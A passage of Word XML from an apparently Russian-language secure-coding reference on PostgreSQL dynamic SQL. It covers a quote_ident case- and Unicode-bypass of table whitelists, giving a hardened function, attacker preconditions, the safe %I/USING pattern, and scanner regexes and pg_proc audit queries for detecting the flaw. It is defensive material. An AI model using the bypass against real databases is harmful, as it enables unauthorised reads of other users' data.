        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    -- ASCII + lowercase + underscore-only check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCDF52E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    IF tbl_name !~ '^[a-z_][a-z0-9_]*$' THEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B43BB5B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        RAISE EXCEPTION 'invalid identifier: %', tbl_name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60775D23" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    END IF;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3CE1B4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    -- Точное сравнение (без lower / normalize)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AB95FF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    IF tbl_name &lt;&gt; ALL(allowed) THEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A64F26" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        RAISE EXCEPTION 'table not in whitelist: %', tbl_name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543733C7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    END IF;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CA445D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN QUERY EXECUTE format('SELECT * FROM %I', tbl_name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAD9347" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F7EF6C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A8D9E6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'^[a-z_][a-z0-9_]*$'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — POSIX char class, который </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не включает</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Unicode letters (PostgreSQL regex с дефолтом не Unicode-class-aware, если не указано </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[[:alpha:]]</w:t>
      </w:r>
      <w:r>
        <w:t>). Этот шаблон отклоняет любые non-ASCII, capital letters, dots, semicolons.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBC3A53" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1916600A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> все версии с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (присутствует с очень ранних, ≥ 7.x).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6F29F7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия атакующего:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EXECUTE на уязвимую функцию + наличие в схеме таблицы с case-mixed/Unicode именем (Variant A).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A9A366" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-condition в коде:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> whitelist через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lower()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>normalize()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ИЛИ whitelist отсутствует ИЛИ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> используется для значений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EE6283" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — корректный инструмент для всех cases, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>где user-input направляется как identifier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Использовать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>только</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для identifier:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4608FD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Правильный pattern: identifier через quote_ident, value через USING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD3C41A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE format('SELECT * FROM %I WHERE id = $1', tbl_name) USING row_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7316EC63" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ИЛИ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51779517" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE 'SELECT * FROM ' || quote_ident(tbl_name) || ' WHERE id = $1' USING row_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739F6865" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — для имени таблицы; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через USING — для значения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>row_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>canonical safe pattern</w:t>
      </w:r>
      <w:r>
        <w:t>, упомянутый в R18 источнике (xflr6 gist).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4574F11D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Признаки атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3252BA48" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Статический сканер</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на plpgsql-коде:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC12058" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident\([^)]+\)\s*=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=\s*quote_ident\(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> слева/справа от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (попытка использовать для значения).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E028EAF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lower\([^)]+\)\s*&lt;?&gt;?\s*ALL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lower\(.*\)\s+IN\b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — whitelist через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lower()</w:t>
      </w:r>
      <w:r>
        <w:t>, требует ASCII-check рядом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5328AAB0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unicode_normalize</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> near </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Unicode-normalize check, требует semantic audit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A28F6FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_proc` audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosrc LIKE '%quote_ident%lower(%'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — функции с lower-перед-quote_ident. Также </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosrc LIKE '%quote_ident%=%'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (broken value pattern).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7097DB3D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_class` cross-check</w:t>
      </w:r>
      <w:r>
        <w:t>: список всех tables (incl. quoted) vs whitelist каждой dynamic-SQL функции — manual audit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC2AE1F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с очень ранних версий (≥ 7.x). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%I')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с 9.1. Никакие фиксы не закрывают этот класс — quote_ident behaviour (conditional quoting) — documented design.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239E9196" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1543F56C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.1 format %s vs %I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> функционально эквивалентен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t>, но с case-quoting subtlety.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2AE01C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.3 EXECUTE USING</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — правильный путь для значений (mis-use Variant C).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E494FF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.4 || конкатенация</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> часто используется без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A34DA2B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.5 SECURITY DEFINER + dynamic SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — где case-bypass becomes critical (read чужих данных под superuser).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A2942B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.14.2 ORDER BY column_name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — application-side analog: identical Unicode-homoglyph bypass class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601AE25A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 quote_ident, quote_literal, format('%I')</w:t>
      </w:r>
